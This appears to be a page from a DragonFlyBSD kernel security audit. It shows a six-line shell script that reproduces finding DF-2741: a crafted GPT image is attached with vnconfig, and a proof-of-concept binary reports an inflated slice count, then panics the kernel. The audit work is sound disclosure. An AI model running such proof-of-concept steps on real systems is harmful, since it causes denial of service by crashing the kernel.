DragonFlyBSD Kernel Audit
DF-2741 / run.sh
← back to finding ↓ download raw
1
2
3
4
5
6
#!/bin/sh
# DF-2741 run (guest, as root)
vnconfig -c /dev/vn0 /root/gpt.img
sleep 1
./poc2741 /dev/vn0 info          # shows nslices=130 vs declared 16
./poc2741 /dev/vn0 hammer        # panics the kernel within ~1 min